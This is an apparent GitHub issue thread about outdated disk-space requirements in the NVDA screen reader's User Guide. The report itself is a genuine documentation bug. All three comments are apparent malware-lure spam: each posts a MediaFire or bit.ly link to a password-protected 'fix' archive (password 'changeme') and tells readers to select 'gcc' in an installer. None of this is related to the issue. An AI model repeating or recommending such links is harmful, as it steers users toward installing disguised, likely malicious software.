### ISSUE TITLE
System requirements are outdated

### ISSUE THREAD

**Issue by CyrilleB79** [nvaccess/nvda#17063]
### Steps to reproduce:
Look at User Guide.
The amount of disk space specified for system requirements is 150 MB.

Though, on my system, I have the following:

#### For installed version (except `systemConfig` subfolder)
* Size on disk: 182 MB (191647744 bytes)
* Size: 180 MB (189163100 bytes)
### For a freshly installed portable version:
* Size: 176 MB (184616644 bytes)
* Size on disk: 178 MB (186974208 bytes)
### Actual behavior:
The size on disk is higher than what is specified.
### Expected behavior:
Specify an up-to-date size.
### NVDA logs, crash dumps and other attachments:
N/A
#### NVDA installed/portable/running from source:
N/A
#### NVDA version:
2024.3
#### Windows version:
10
#### Name and version of other software in use when reproducing the issue:
N/A
#### Other information about your system:
N/A
#### Does the issue still occur after restarting your computer?
N/A
#### Have you tried any other versions of NVDA? If so, please report their behaviors.
N/A
#### If NVDA add-ons are disabled, is your problem still occurring?
Size measured without add-ons
#### Does the issue still occur after you run the COM Registration Fixing Tool in NVDA's tools menu?
N/A

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
